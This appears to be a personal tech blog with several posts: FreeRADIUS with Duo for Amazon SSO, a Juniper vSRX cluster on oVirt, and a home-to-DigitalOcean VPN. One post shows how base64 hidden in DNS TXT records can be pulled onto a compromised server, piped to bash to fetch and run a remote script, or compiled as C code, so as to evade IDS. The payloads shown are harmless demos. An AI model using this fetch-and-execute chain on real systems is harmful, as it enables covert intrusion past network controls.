Amazon SSO with MFA Using Duo

Amazon SSO is their suggested platform instead of SAML federation / ADFS. This works because you can very quickly deploy AD instances in two availability zones and then hook up their AD Connector so you can leverage SSO with on-prem AD (technically synced up to your Amazon, but I digress) and then can do MFA/2FA with a RADIUS server

The documentation with what they “need” from your RADIUS response is sparse. They don’t tell or elude how to setup the RADIUS side and as a result, you’re left with just figuring out the RADIUS component (or at least I was). What I found out was that when the RADIUS request comes in it just needs to respond true/false…

I wont go through all the details as this post makes some assumptions like very moderate experience with FreeRADIUS, setting up SSO in Amazon w/ MFA, and configuring in app in Duo to be protected

The way this was accomplished was simple: FreeRADIUS can exec scripts or commands with the exec module for authorization and authentication so I figured why cant I kick off sudo with login_duo. I am not guaranteeing the FreeRADIUS configuration is pretty or correct or would survive under load, however for me, I only had to authenticate basically myself

FreeRADIUS configuration

99% of the config from CentOS 7.3 freeradius install was left stock. I am also fairly confident that the FreeRADIUS project lead would have another forum mailing list aneurysm response based on my suggestions but with how huge, feature rich, and (somewhat) flexible it is, I had to do what eventually worked. The documentation is vast as well so its kind of like finding a needle in a haystack. The goal was simple, make login_duo the provider for authorize and authentication

I deleted all elements under authorize and authentication stanzas in /etc/raddb/sites-enabled/default and replaced it with the below (add the final })

authorize {
        update control {
                Auth-Type := radauthorize
authenticate {
        Auth-Type radauthorize {

Then created /etc/raddb/modules-enabled/loginduo which just uses the exec module with a wait period

exec loginduo {
	wait = yes
	shell_escape = yes
	program = "/usr/bin/sudo -u %{User-Name} /usr/sbin/login_duo"
	timeout = 30

Amazon SSO does not send the password – just the MFA code. This proved slightly annoying since then I couldn’t use PAM via RADIUS for the MFA (which is better than calls to login_duo command) and I was left with login_duo since the “password” field was populated with the MFA code. When you enter this in Amazon SSO, it can be garbage since you can use login_duo with autopush – it just means you can only support autopush

This is about all you need to get Amazon SSO with Duo MFA

vSRX Cluster on oVirt/RHEV

My most recent tinkering endeavor has been trying to get Juniper vSRX running on something more than just a flat KVM host which is what their documentation outlines

Along the way during this I hit a lot of odd little things that either were not documented at Junipers site or took a fair bit of engineering to figure out. Junipers documentation is great for standalone KVM systems but if you have something like this, the documentation isnt entirely applicable (ex: they outline creating isolated network vs us having to create L2 bridge interfaces in oVirt)

The benefits of something like oVirt or RHEV is a central plane for managing multiple KVM nodes. What this means is, for instance, if you have 2 or 3 nodes you can cluster them together and in this example it is configuring two vSRX’s in a cluster and pinning them to individual nodes

This won’t cover things like configuring oVirt install, the network switches, trunking VLANs, or that nitty-gritty configuration. This will make assumptions about configuration requirements and strength of knowledge however, when that assumption is being made it will be noted

Initial Notes / Pre-req

Here are some high level initial notes that I learned that can be helpful to take in to consideration during this setup

  1. MAC Spoofing Requirement: You need install the package ‘vdsm-hook-macspoof’ on each of your oVirt KVM nodes. This is because the vSRX needs to be able to spoof MAC addresses and have the upstream network and KVM hosts learn the internal MAC addresses (you’ll see why later)
    1. After you install the macspoof hook you need to run the following command on your oVirt engine node
      engine-config -s "UserDefinedVMProperties=macspoof=(true|false)"
  2. Cloning: Dont clone the VM to make a secondary. Do fresh build each time you need a new node
  3. IGMP Snooping: The vSRX documentation covers this about disabling it on a single node but does not cover it at all about if you want to separate the vSRX’s between two separate nodes. If you do so you need to make sure you disable IGMP snooping between the entire pathway between the two KVM nodes. What this means is, if your two KVM hosts are directly attached then disabling IGMP snooping on the hosts is all you need to do but if they are connected up to a switch (like mine) then you need to ensure IGMP snooping is disabled there as well otherwise you will see extremely weird behavior (to say the least)
  4. NIC Ordering Configuration: NIC ordering and count differs depending on how you’re configuring your setup
    1. Clustered vSRX –
      1. vnic1 = fxp0
      2. vnic2 = em0 (will show up as ge-0/0/0 before enabling clustering)
      3. vnic3 = fab0 (will show up as ge-0/0/1 before enabling clustering)
    2. Nonclusered/standalone
      1. vnic1 = fxp0
      2. vnic2 = ge-0/0/0
  5. NIC Ordering (Advanced): The vSRX will map NIC’s to each slot as it pertains to the numerical order of ‘slot’ setting as seen in ‘virsh dumpxml <id>’ command, meaning, that if you dump the virsh XML you will see configuration for “<interface type=’bridge’>” and what you have to pay attention to is the section for ‘slot=0x0#’. The lowest will be fxp, second up from there is em0, third is fabric, and fourth is your internet NIC.

    NOTE A BUG in oVirt

    That while I was doing my setup it was observed the em0 control link could not see its partner. What was identified was that oVirt had 
    shown me that the NIC order was as it was needed for a cluster in vSRX, however, when I ran 'virsh dumpxml ${ID}', where ${ID} is the ID of the VM, 
    and looked at the order of slot= it was evident the order was not how we needed it where fxp should be lowest then em0 second, and so on. 
    This identified that while oVirt had the order correct on the front end UI, the XML behind the scenes had the FXP bridge on slot='0x06' 
    whereas it needed to be on slot='0x03'. The fix here was to change the vNIC network association in oVirt UI

    Here is an example of correct / oVirt outputting vNIC config to the XML as it shows in the UI. I highlight slot=’0x’ so you can see the part I am referencing that matters the most to the vSRX clustering component

    You’ll notice that I have the NIC’s in the order they need and what I expect in the XML output. What was noticed on the vSRX cluster was that they couldnt see each other. This made it clear the em0 control links were not configured correctly in some fashion.  At this point looked at the at the virsh dumpxml output for the VMs and could see that the NIC association in the XML was wrong being that vSRX expects fxp NIC to be the lowest slot= #. I no longer have that XML output but it was easy to figure out what to do since you could see the MAC address. Take that and cross it to what the oVirt UI shows and then reconfigure the network association accordingly. Here is what mine ended up coming out to be for my secondary:

    Instead of FXP, em0, fabric, ge-0/0/0 it had to become fabric, fxp, em0, ge-0/0/0

  6. fab0/1 MAC address generation (Clustering): This was a strange and tough one…the MAC addresses for fab0 and fab1 are generated by the vSRX on first boot. The last two bytes of these MAC addresses are borrowed from the first two bytes of the MAC for the fxp0 interface. So, what this means, is if you leave oVirt auto-generated it will end up generating the same MAC for both nodes. In a cluster you need to change the fxp0 link (vnic1) to have different first two bytes in the MAC addresses on the secondary vSRX so it will generate unique MAC addresses
  7. We are going to be doing this as a cluster. Some things executed in a cluster are not applicable to standalone
  8. oVirt doesnt make it easy to import images (at least that I tried). The easiest way I did this was to download the KVM image Juniper to one of your nodes. Create the VM with its backing storage and then use dd to overwrite it in place – more on this later
  9. Using the oVirt console with remote-viewer wont be helpful here. vSRX loads Windriver Linux first and then kicks off virtualization layer for the actual JunOS software. I outline how to obtain a console below


  1. 2 KVM nodes on CentOS 7
  2. oVirt 4.x
  3. 4 networks configured in oVirt (outside of ovirtmgmt) – this equates to a Layer 2 bridge. In my setup I had them actually VLAN tagged so the #’s there reference their VLAN tag # on my network and how it was configured in oVirt
    1. vlan1029_VSRXC – Control link em0 (we dont actually IP this on the vSRX)
    2. vlan1027_VSRXF – Fabric link (fab0/1)
    3. vlan1030_VSRXM – Management link / fxp0
    4. vlan1031_VSRX – Main untrust interface to the internet
  4. vSRX01 pinned to KVM node 1
  5. vSRX02 pinned to KVM node 2


  1. As outlined above, first make sure you have your VM networks setup and you have your two KVM nodes active and working in your oVirt cluster. Create two new VM’s and name them ‘vsrx01’ and ‘vsrx02’. Create the VM as you normally would with backing storage (doesnt matter the size as we blow it away anyway). Click ‘Console’  on the left in the settings dialog and configure it as video type CIRRIUS
  2. Now navigate here and login when prompted after clicking the KVM image. Accept the license and then copy the URL in the box
  3. Now SSH to KVM node 1 and use the following command:
    curl -o vsrx.qcow2.img ${URL}

    Where ${URL} is the URL you copied from the Juniper download page

  4. Now we need to convert the disk from qcow2 to raw. I could not seem to get it to work with qcow2 which was odd to me. If I left it as qcow2, oVirt refused to boot it
    qemu-img convert -O raw vsrx.qcow2.img vsrx.raw.img
  5. Now you need to locate the path to your disk – an example (up until dd command) is provided below for the steps for the shell commands
    1. Click the virtual machine tab in the oVirt web UI
    2. Left click your VM vsrx01
    3. Click the disk tab in the lower panel
    4. Note the name of your disk – it should be vsrx01_Disk1
    5. Now on the top tab click “Disks
    6. Locate your disk – then left click it
    7. In the lower panel observe the ID #
    8. On the KVM node you are on where you downloaded and converted the KVM image file do a ‘df -h‘ and locate the full path to the underlying storage for the volume where your disk resides. For me I know ‘DS_PROD_NON_HA_NFS_1’ resides on as you can see below
    9. Now, cd to that base path (easier this way)
    10. Execute a find command with the switch -iname  and include your disk ID – this will help you locate the full path to your disk as it pertains to your VM
      find . -iname \*837cd864-8228-4ade-95d5-37432434d88e\*
    11. Now that you have that relative path for where you are – for me it is ‘./c65e60da-d890-40b1-a76b-a67a24b46086/images/837cd864-8228-4ade-95d5-37432434d88e’ – cd to that directory
    12. Now you have located your VM’s disk image. Here is where you will run dd to put the vSRX image in place
      dd if=/root/vsrx.raw.img ${FILE} bs=4M status=progress

      Where for me ${FILE} would be ‘e2f52fa0-2708-4fe8-9b6c-9d893933b785’

      If you get an error about ‘status=progress’ then just remove that part. Fairly certain oVirt 4.x requires CentOS7/RHEL7 so you should have that flag

    13. Repeat this for second vSRX as well
    14. Below you can see a screenshot of an example of the shell commands
  6. Now that you have the images deployed its time to come back to the vnic configuration as outlined above –
    1. Go back to the ‘Virtual Machines’ tab in oVirt web UI
    2. Left click your VM
    3. Then in the lower panel click ‘Network Interfaces’
    4. As outlined above, configure your vNIC as such:
      1. vnic1 = fxp interface – vlan1030_VSRXM
      2. vnic2 = em0 interface – vlan1029_VSRXC
      3. vnic3 = fab interface – vlan1027_VSRXF
      4. vnic4 = ge-0/0/1 interface (ge-0/0/0 will be used for fab link)
    5. As you recall, on the secondary vSRX make sure to change the first 2 bytes of the MAC address for vnic1 / fxp interface. It can be anything
    6. Additionally, right click your VM’s and go to edit. Click ‘Custom Properties’ and type ‘macspoof’ with a value of ‘true’. This will allow the vSRX to, you guessed it, spoof MAC addresses
    7. Once confirmed, start your VMs
      1. If while doing the setup you dont get the cluster built or control links cant see each other, then please reference my note above about confirming the vNIC real ordering via the virsh xml and slot config setting
  7. First boot can take awhile – anywhere between 5-10 minutes – as it initiates all the interfaces. Dont bother with the usual console viewer that you are used to with most VM’s in oVirt. Rather, SSH to the KVM node for where your VM’s are running and run the following to obtain the path to the socket file containing the console access you need and can reach via nc
    $ ps -Aef | grep -i charserial0 | tr ',' '\n' | grep -i 'vmconsole'

    Now take what you see after path= and use nc (‘yum install nc’ if you have to) to connect

    $ nc -U /var/run/ovirt-vmconsole-console/5ded6037-e0b2-4e41-8b7b-9b43e3e8a5cf.sock
    <press return>

    Of course, the above example is from my live setup

    Note: I cannot recall if the above comes out of the box for oVirt. I believe it does but if the above does not work for you then you need to spend a few to get vmconsole set up. I believe the above works fine and the function I describe is to access virsh console over SSH

  8. At this point with nc and attached to the consoles. Login with ‘root’ and do the usual stuff like setting root password and such –
    Hint: If you need to ctrl+c do ctrl+v then ctrl+c and then press return

    1. Enter cli
    2. Enter conf
      set system root-authentication plain-text-password
    3. Enter the password you want to use
    4. Configure your fxp0.0 – for me it was for primary:
      set interfaces fxp0.0 family inet address

      And for secondary it was .242/28

    5. Type exit to back out of config mode and now we’re going to set the chassis cluster configuration and reboot. NOTE: When you do this you are only going to have one fxp0 so if you notice some “weirdness” after you boot back up and trying to use fxp IP for management, thats why. By weirdness I mean if you are SSH’ed in and then it drops then you SSH again and now you’re on the secondary…this is because you need to setup group configuration for fxp. I wont cover that here but you can find the KB article here

      set chassis cluster cluster-id 5 node 0 reboot


      set chassis cluster cluster-id 5 node 1 reboot
    6. Now once you’re back and booted up you can run the following. This is straight out of juniper documentation for setting fabric link and set reth devices-
      user@vsrx0# set interfaces fab0 fabric-options member-interfaces ge-0/0/0
      user@vsrx0# set interfaces fab1 fabric-options member-interfaces ge-7/0/0
      user@vsrx0# set chassis cluster reth-count 2
      user@vsrx0# set chassis cluster redundancy-group 0 node 0 priority 100
      user@vsrx0# set chassis cluster redundancy-group 0 node 1 priority 10
      user@vsrx0# set chassis cluster redundancy-group 1 node 0 priority 100
      user@vsrx0# set chassis cluster redundancy-group 1 node 1 priority 10
      user@vsrx0# commit
    7. That should be it! Please reach out in the comments if you have any questions or hit any issues

Hybrid cloud from home using DigitalOcean

This is something I had been wanting to do for awhile and the concepts were always floating around in my head. At a high level, I wanted to join a network at my home to a cloud provider. Why? Mostly just because I wanted to see if I could do it and how it could be done – this weekend I had a reason and I did it. More specifically, I wanted to see how I could “get” my own static IP from a cloud provider and forward connections on ports to the DigitalOcean VM back to my house

What I am doing below is not the absolutely most secure thing. You should understand the risks involved with this and know that what I am providing below is a “to get going” kind of tutorial

 — — —

I had recently been doing a lot of tinkering with OcServ ( and OpenConnect. These are the open source equivalents of Cisco AnyConnect SSL VPN client and server. BIG shoutout to this software suite…completely dead easy to use and the developer is very active, responsive, and helpful on his gitlab ( Internally in my home network I have a Juniper SRX firewall that I wanted to test this out on and forward the IKE ports back to my house. My home network is

Ultimately I will be documenting what you need and trying to keep my Juniper bits out of it. But I will cover that too so you know what you need if you ever want to tinker like this

Heres what you need

  1. A DigitalOcean VM with private networking enabled
  2. A Raspberry PI 3 Model B – or an equivalent device with two network connections. A laptop works too. You just need one a device with two NIC’s so one can route for the switch and the other (your initial default route) through the internet:
  3. ocserv installed on the DigitalOcean VM
  4. openconnect installed on the Raspberry PI 3 (or equivalent device)
  5. An unmanaged switch (managed would probably work too, but unmanaged ensures no VLAN tagging issues / configurations)
  6. A secondary network device (in this case, it would be my Juniper device):

I primarily use Fedora and CentOS so adjust accordingly (ex: CentOS disables asymmetrical routing by default, which we need)


The “too lazy didnt read” is simply this:

  1. Connect your PI to the switch and configure it to act as a router for your other device (iptables, etc)
  2. On the DigitalOcean VM, install ocserv and configure it. Have it work with your private network assigned on eth1. A small /29 or /28 should suffice for what IPs to hand out
  3. On your PI, run openconnect and connect to your DigitalOcean external IP – this will give you a VPN tunnel to DigitalOcean private network. Note the IP you have been assigned. You can find this by seeing the line “Connected as <IP>”
  4. On the DigitalOcean VM, set a route for (or whatever your home network is) to route to your tun0 interface IP on your PI (the IP you noted in step 2)
  5. Ping (your PI, or whatever IP you have on it) and notice you get a response. You should be able to ping the other device you have behind the switch
  6. You can now use iptables to port forward stuff back to your house via the eth0 external IP


We are going to make our PI act as a router for the home network. Once we confirm we can move traffic to and from the internet with that setup we are going to connect via openconnect to our DigitalOcean external IP. The DigitalOcean OCServ software will be responsible for handing out a small /29 set of 10.x.x.x/x IPs from the /16 that DigitalOcean gave us. OCServ will tell connecting clients (our PI) that it will take one of those IPs with its gateway being the first IP in the range. Then, OCServ will tell the connecting client that their new default route is now it (OCServ internal IP on DigitalOcean VM).

What this achieves is it makes our PI have its next-hop as the DigitalOcean VM via a private SSL VPN tunnel and thus, any traffic coming in to the PI will be routed out up through DigitalOcean through this VPN and then egress as our external IP in DigitalOcean. Likewise, you can also port forward traffic from the external IP on DigitalOcean VM or on the internal private network assigned to you by DigitalOcean back to your house

This can probably be achieve by something else like OpenSwan or the similar, however, an SSL VPN like this to me is more lightweight and easier to configure; plus, I am going to be setting up an IPSEC VPN from my Juniper devices behind the switch, so the less in the way the better (although I don’t really care about performance). I had already setup OCServ a few times as it was so I went this route


First we’re going to make sure we have what we need at the house side. Substitute PI and Juniper for what you’ve selected

Here is how this looks at a high level from the house side

          Raspberry Pi (or equivalent)

On the PI

We need to enable it as a router which means iptables and sysctl. First install iptables and its utilities. Since this is CentOS 7 for me, I needed to install them

yum install -y iptables iptables-services iptables-utils

And I have prepared a little script to do the “making routing” portion minus one detail. Don’t run this yet, just save it as “/root/mkrouter”

#!/usr/bin/env bash

# Which port is connected to the switch

# Which port is your default route / upstream to the internet

ip link set up ${SWITCH_INTERFACE}
ip addr add $1 dev ${SWITCH_INTERFACE}
sysctl -w net.ipv4.ip_forward=1
service iptables start
iptables -A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT

I have noticed that iptables includes reject rules by default, so we are going to delete those

Open /etc/sysconfig/iptables and delete the two lines that contain REJECT

Now we need to enable asymmetrical routing. The below command is a pretty big hammer but somewhat necessary. I have seen net.ipv4.conf.all.rp_filter not always work sometimes unless its persisted and setup to configure it at reboot

for i in $(sysctl -a 2> /dev/null | grep -i rp_filter | grep -iv arp_filter | awk '{ print $1 }'); do sysctl -w $i=2; done

Dont forget that you’ll want to make these settings persistent via /etc/sysctl.d/!

Now save iptables

iptables-save > /etc/sysconfig/iptables

Now lets run our script


From your other device – in my case the Juniper – set a default route towards For my juniper it would be

set routing-options static route next-hop

For another Linux device it would be

ip route set default dev <YOUR_DEVICE_CONNECTED_TO_SWITCH> via

Obviously substitute <YOUR_DEVICE_CONNECTED_TO_SWITCH>. For me, on my Juniper, it was ge-0/0/0.0 – depending on your OS this could be eth0, eth1, or something as abstract as enp0s2f3 🙂

From this secondary device you should be able to ping something far away like Test it out. Ex from my Juniper:

root@home-ro0# run show route 

inet.0: 9 destinations, 9 routes (9 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both          *[Static/5] 00:14:42
                    > to via ge-0/0/0.0

root@home-ro0# run ping    
PING ( 56 data bytes
64 bytes from icmp_seq=0 ttl=55 time=24.002 ms
64 bytes from icmp_seq=1 ttl=55 time=27.720 ms

So this concludes turning our PI (or equivalent) in to a router. Next, we’re going to connect it up to our DigitalOcean VM

So what we have now is:

                  Raspberry Pi 
             wlan0 =
              eth0 =
   ge-0/0/0.0 = - default route via

On DigitalOcean VM

This is assuming you have already enabled private networking per the requirements above. For me, I was given Also note your eth0 assignment as you’ll need it to substitute these values below

You can install OCServ via EPEL if you are running CentOS. I will not cover that here. Simply navigate to the EPEL site, enable the CentOS 7 repository, and then install ‘ocserv’ package

You will also need to generate a cert. Whether you choose to do a self signed or get a root signed, I will not cover that here. When you connect via openconnect command you have the option of answering that you don’t care about any cert warnings/errors

Pretty much all I will show you here is example configuration for OCServ with the scope I was given. I have, my VM was assigned so I am going to use for my VPN subnet

What this means is, as noted above, when an AnyConnect/openconnect client connects to your DigitalOcean external IP, OCServ will offer an IP in that range with being the gateway for that client (being, the PI)

For your certs, the below configuration assumes you are saving them where I did under /etc/ocserv/ssl. You will notice mine says ‘chained’ because I obtained my cert from DigiCert and I chained the intermediate cert

So after you have installed OCServ you can use the example configuration below

I have highlighted the two most critical lines. The first is the network you want to configure which is based on what you get for eth1 and then the “no-route” part for telling connecting clients that you dont want them to route connections to your DigitalOcean external IP through the tunnel. You only want to send everything else there

auth = "pam[gid-min=1000]"
tcp-port = 443
udp-port = 443
run-as-user = ocserv
run-as-group = ocserv
socket-file = ocserv.sock
chroot-dir = /var/lib/ocserv
isolate-workers = true
max-clients = 16
max-same-clients = 0
keepalive = 32400
dpd = 90
mobile-dpd = 1800
switch-to-tcp-timeout = 60
try-mtu-discovery = false
server-cert = /etc/ocserv/ssl/
server-key = /etc/ocserv/ssl/
ca-cert = /etc/pki/ocserv/cacerts/ca.crt
cert-user-oid = 0.9.2342.19200300.100.1.1
auth-timeout = 240
min-reauth-time = 300
max-ban-score = 50
ban-reset-time = 300
cookie-timeout = 300
deny-roaming = false
rekey-time = 172800
rekey-method = ssl
connect-script = /usr/bin/ocserv-script
use-occtl = true
pid-file = /var/run/
device = vpns
predictable-ips = true
default-domain =
ipv4-network =
dns =
dns =
ping-leases = false
route = default

# Dont route our own gateway for the connection through clients tunnel
#no-route = <your_digitalocean_vm_eth0_ip>/

cisco-client-compat = true
dtls-legacy = true
user-profile = profile.xml

You’re also going to need to enable rp_filter and ip.forward. So swing the hammer again:

# for i in $(sysctl -a 2> /dev/null | grep -i rp_filter | grep -iv arp_filter | awk '{ print $1 }'); do sysctl -w $i=2; done

# sysctl -w net.ipv4.ip_forward=1

Dont forget that you’ll want to make these settings persistent via /etc/sysctl.d/!

We’re now going to move back to the PI where we are going to configure openconnect

Back on the PI

If you’re not using a PI then congrats! Just enable EPEL on your PI equivalent (laptop,etc) and install openconnect from repo


Something I discovered halfway through writing this is that openconnect does not have any packages for the PI. I found this out because for this exercise I used my laptop the whole way, until I decided to implement it on my PI (as I am writing this). So, this was fun. I will run through the steps but please note they will be quick as they are scratch notes from implementing this today. I also will not delve in to many details, so if you’re unsure then find a laptop and use that (then restart at the steps above)

Be sure to be ready to allocate probably 2-3 hours for this part :-/

First install development tools

yum groupinstall -y 'Development Tools'

Then install dependent packages

yum install -y libgcrypt-devel libgcrypt openssl-devel openssl gnutls gnutls-devel libxml libxml2-devel

Now the long part…we have to install cpan to get an old Perl module for the vpnc configuration

yum install -y perl-CPAN
<select all the defaults>
<once you're at the CPAN cli type the following>
install Fatal

Now fetch the vpnc dependency. More can be found here

curl -o vpnc.tar.gz
tar -xvzf vpnc.tar.gz
cd vpnc-*
make install clean

This should go in fairly straight forward. Its a pretty lightweight thing

And now install openconnect

curl -o openconnect.tar.gz
tar -xvzf openconnect.tar.gz
cd openconnect-*
./configure<br>make install clean

And now connect it to your DigitalOcean external IP. Below is an example of what you should see:

Server certificate verify failed: certificate does not match hostname

Certificate from VPN server "${YOUR_DIGITALOCEAN_EXTERNAL_IP}" failed verification.
Reason: certificate does not match hostname
To trust this server in future, perhaps add this to your command line:
    --servercert sha256:<snip>
Enter 'yes' to accept, 'no' to abort; anything else to view: yes
XML POST enabled
Please enter your username.
Please enter your password.
Got CONNECT response: HTTP/1.1 200 CONNECTED
CSTP connected. DPD 90, Keepalive 32400
Connected as, using SSL
Established DTLS connection (using GnuTLS). Ciphersuite (DTLS1.2)-(PSK)-(AES-128-GCM).

From the above you’ll notice the following things

  1. I have accepted the invalid cert. For this it was because the hostname I connected to did not match (because I used IP). I demonstrated this here so you can see that you can accept insecure certs
  2. I logged on as root with the root password of the server (THIS IS BAD: I am only showing for concepts). OCServ uses PAM to authenticate a user, so your options are pretty much endless there (RADIUS, LDAP, AD, Kerberos, NIS, etc)
  3. I was given the IP And what you dont see is what I am going to show you below. Note this IP that you see because we need it later back on the DigitalOcean VM
[root@ck-centos-rpi3 ~]#  ip route
default dev tun0  scope link dev tun0  scope link 
${YOUR_DIGITALOCEAN_EXTERNAL_IP} via dev wlan0  src dev eth0  proto kernel  scope link  src dev wlan0  proto kernel  scope link  src

[root@ck-centos-rpi3 ~]#  ip route get dev tun0 src 

[root@ck-centos-rpi3 ~]#  ping
PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=59 time=24.6 ms
64 bytes from icmp_seq=2 ttl=59 time=21.6 ms

[root@ck-centos-rpi3 ~]# curl
^ My DigitalOcean VM external IP

So what does this show us? We now have the following in place:

  1. A default route out of tun0
  2. Route the entire through tun0
  3. Default route through tun0
  4. And then keep everything else intact

Now, from your secondary device (in my case, the juniper) you wont be able to do anything yet. We have to jump back up to the DigitalOcean VM before we can move traffic

Jump to the DigitalOcean VM

Now, since we’re all setup and connected, we just need to tell our DigitalOcean VM that traffic for needs to be sent down the tunnel interface of vpns0 via the gateway IP which is what my PI was assigned when openconnect connected successfully

[root@do-gw-proxy ~]# ip route add dev vpns0 via

And now you will see we can reach back to our house!

[root@do-gw-proxy ~]# ping
PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=64 time=23.4 ms

And now I will SSH to my Juniper to show you that you can now reach back home from your DigitalOcean VM

[root@do-gw-proxy ~]# ssh
Last login: Tue Jun 13 22:23:51 2017 from
--- JUNOS 15.1X49-D90.7 built 2017-04-29 06:16:43 UTC

[root@do-gw-proxy ~]# ssh
root@'s password: 
Last login: Tue Jun 13 18:44:17 2017 from
[root@ck-centos-rpi3 ~]# netstat -tnap | grep -i established
Active Internet connections (servers and established)
tcp        0      0       ESTABLISHED 16855/sshd: root@pt 
tcp        0      0     67.205.x.x:443      ESTABLISHED 1734/openconnect   

And as you can see, I SSH’ed to my RPI and my SSH is connected from which is my IP on my DigitalOcean VM. You can see I have an persistent connection to my DigitalOcean VM via openconnect but I am connected from 136.3.193, which is the IP of the DigitalOcean VM vpns0 interface

[root@do-gw-proxy ~]# ip addr show eth1 | grep -i 10.136
    inet brd scope global eth1




Using DNS TXT Record Abuse for Exploiting Servers

With everything thats been in the news lately with malware and WannaCry, I figured it’d be fun to proof this out for myself and post about it. The below, of course, assumes that your environment has already been compromised or has someone on it that wants to do something nefarious (disgruntled employee?). I am going to show you, in its most simplistic form, how you can abuse DNS TXT records for leveraging passing data in between servers and more so, when the server you want to exploit is behind a firewall and can only do DNS requests

Why is this useful? This is useful because data in an TXT record can be any combination of ASCII text. What this means, simply, is that you are able to obfuscate data with GPG or, even more simply, base64 encode and decode. This is beneficial for hiding from an IDS or IPS.

DNS is everything. When things fail, its usually because of a DNS issue (within context, of course) but typically DNS traffic is relatively trusted in organizations. The abuse of DNS here is being in the context of, for instance, when a DNS server does not know of a record, when asked it, will forward a request to the root zones which will then attempt to try to find the controlling DNS server for the queried domain so that it can return a result for the queried hostname

Example: I am a server inside of an organization that has the ability to issue DNS requests. What this means is that I can request – my internal DNS server probably knows this already from cache and responds. What if I ask for My internal DNS server probably wont know this and will forward it up to the .net root DNS to ask .net where ckozler under .net is. .net responds with NS record Then is queried for the @ record for which responds with (the host for where you are reading this page)

So what happened here? I was able to “leave” the organization to request data from an external server and retrieve it and read it. Simply put, instead of being able to use curl or wget to request something from a remote web server, I used DNS to traverse the open internet and get input from a remote server. As I said earlier, TXT records can contain ASCII text. ASCII text means data and data means exploits.

Below I will show an example of this. I will describe the environment as well so hopefully after you reading this you can understand what is going on from a technical standpoint. It will be extremely high level, because I’m not hacker or security expert, but it will show you how you can move data between sites with DNS TXT records

The idea of obfuscating the data inside the TXT records is so that when IDS’ and IPS’ are inspecting the traffic, they arent able to really see “inside” of the response. All they see is a random array of ASCII text

DISCLAIMER: I am not a security expert or try to pose as one. I am simply showing how hackers and malware writers are able to leverage basic functions of networking that could be much harder to detect


‘client’ is an already compromised server inside an organization somewhere – whether it be a disgruntled employee or what not. The only requirement is that it can query DNS. Lets assume its locked down from outbound access to any server except the internal DNS server.

Again, there are a ton of assumptions here, I am just showing the concepts

I will show 2 examples. One is that I am fetching a remote bash script via curl and then executing it. The second is fetching C code and then compiling it and running it. Example 1 assumes HTTP/HTTPS outbound from the server is allowed and example 2 assumes the server has gcc installed

Example 1

client]$ dig -t TXT | grep ^txt	6601	IN	TXT	"Y3VybCAtcyAtcSBodHRwczovL2Nrb3psZXIubmV0L3JlbW90ZV9zaGVsbC50eHQu"

client]$ dig -t TXT | grep ^txt	7141	IN	TXT	"cGhwCg=="

client]$ dig -t TXT | grep '^txt' | awk '{ print $5 }' | tr -d '"' 

client]$ dig -t TXT | grep '^txt' | awk '{ print $5 }' | tr -d '"' | openssl enc -base64 -d 
curl -s -q

client]$ dig -t TXT | grep '^txt' | awk '{ print $5 }' | tr -d '"' | openssl enc -base64 -d | bash -s 
#!/usr/bin/env bash

echo "Hello world! I was downloaded from with instructions from a TXT DNS record"
exit 0

client]$ dig -t TXT | grep '^txt' | awk '{ print $5 }' | tr -d '"' | openssl enc -base64 -d | bash -s  | bash -s
Hello world! I was downloaded from with instructions from a TXT DNS record

So what happened? You can see that I can query and get data…then and get the second line of the base64 encoded strings. These two lines give me the lines from the bash script that is hosted at I then decode it and run it which then spits out “Hello world!”

The magic here is the base64 encoded data. Of course, I am sure IDS and IPS’ can pick this up but base64 is a good, quick, and easy way to obfuscate data and try to hide

This example just proofs the concept of how to move data or instructions in between a remote external DNS server and a “secured” internal server

Example 2

Now we’re going to fetch some C code from TXT records and run it. The previous example assumes HTTP/HTTPS (port 80 and 443) outbound towards is open. Well, what if this isnt the case? What if we, for instance, see that the kernel on server ‘client’ is susceptible to a privilege escalation exploit. Perfect! Lets get some code from DNS TXT records!

Note: Click the arrow in the top right to open the shell code in another window

# Get the first line of the base64 encoded C code
client]$ dig -t TXT | grep ^c_code_line 3599	IN	TXT	"I2luY2x1ZGUgPHN0ZGlvLmg+CmludCBtYWluKCkgewoJcHJpbnRmKCAiaGVsbG8g"

# Get the second line
client]$ dig -t TXT | grep ^c_code_line 3599	IN	TXT	"d29ybGRcbkkgd2FzIGRvd25sb2FkZWQgdGhyb3VnaCBhIFRYVCByZWNvcmQgYW5k"

# Get the third line
client]$ dig -t TXT | grep ^c_code_line 3599	IN	TXT	"IGNvbXBpbGVkIGxvY2FsbHkiICk7CglyZXR1cm4gMDsKfQo="

# Now get them all at once
client]$ dig -t TXT | grep ^c_code_line 3599	IN	TXT	"I2luY2x1ZGUgPHN0ZGlvLmg+CmludCBtYWluKCkgewoJcHJpbnRmKCAiaGVsbG8g" 3562	IN	TXT	"d29ybGRcbkkgd2FzIGRvd25sb2FkZWQgdGhyb3VnaCBhIFRYVCByZWNvcmQgYW5k" 3564	IN	TXT	"IGNvbXBpbGVkIGxvY2FsbHkiICk7CglyZXR1cm4gMDsKfQo="

# We still have quotes, want to get rid of them
client]$ dig -t TXT | grep ^c_code_line | awk '{ print $5 }'

# Now its cleaned up, its literal base64 encoded text
client]$ dig -t TXT | grep ^c_code_line | awk '{ print $5 }' | tr -d '"'

# When we pass it to openssl -d we can see the actual text
client]$ dig -t TXT | grep ^c_code_line | awk '{ print $5 }' | tr -d '"' | openssl enc -base64 -d
#include <stdio.h>
int main() {
	printf( "hello world\nI was downloaded through a TXT record and compiled locally" );
	return 0;

# Now lets pass it to a file and compile it with GCC
client]$ dig -t TXT | grep ^c_code_line | \
> awk '{ print $5 }' | tr -d '"' | \
> openssl enc -base64 -d > /var/tmp/txt.poc.c; gcc -o /var/tmp/txt.poc /var/tmp/txt.poc.c; /var/tmp/txt.poc
hello world
I was downloaded through a TXT record and compiled locally


So what you can see here is we were able to successfully move C code via TXT DNS records. Of course, large exploits would require many lines but things such as shell code privilege escalation exploits would be many less lines

I hope you found this post informative. Any mistakes I made or anything not clear please feel free to drop a line in the comments


iomonitor – wrapper script for ioping

Link to it on my github because formatting is screwed up here

This is a wrapper script for ioping. Can be implemented in to a cronjob (ex: with ) or as an NRPE command for nagios. Use –nagios-perfdata to generate perfdata for Nagios to consume

